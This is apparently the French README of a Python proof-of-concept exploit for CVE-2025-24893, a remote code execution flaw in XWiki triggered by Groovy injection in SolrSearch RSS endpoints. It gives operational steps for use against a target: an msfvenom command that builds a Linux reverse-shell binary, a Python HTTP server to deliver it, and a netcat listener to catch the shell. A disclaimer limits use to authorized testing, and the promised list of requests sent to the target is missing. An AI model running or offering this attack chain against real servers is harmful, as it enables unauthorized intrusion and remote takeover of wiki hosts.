
PoC exploite CVE-2025-24893, une vulnérabilité d'exécution de code à distance (RCE) dans XWiki causée par un sandboxing incorrect dans les macros Groovy rendues de manière asynchrone. Elle permet l'exécution arbitraire de commandes via l'injection dans les points de terminaison SolrSearch basés sur RSS.
Auteurs : Net.Doge & Infinit3i
Ce script Python exploite CVE-2025-24893, une vulnérabilité d'exécution de code à distance (RCE) dans XWiki causée par un sandboxing inadéquat dans les macros Groovy exécutées de manière asynchrone. Il permet l'exécution de commandes arbitraires via une injection dans les endpoints RSS basés sur SolrSearch.
msfvenom)Clonez ou téléchargez le script.
Assurez-vous d'avoir les éléments suivants installés :
msfvenom de Metasploitjq (utilisé dans les payloads bash)Exécutez le script :
python3 CVE-2025-24893-PoC.py
Choisissez dans le menu :
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<votre_ip> LPORT=<port_beacon> -f elf -o rev
python3 -m http.server 8080
nc -lvnp 31337
Le script envoie la séquence suivante à la cible :
Cet outil est destiné uniquement à des fins éducatives et de tests autorisés. Toute utilisation non autorisée contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite est illégale et contraire à l'éthique.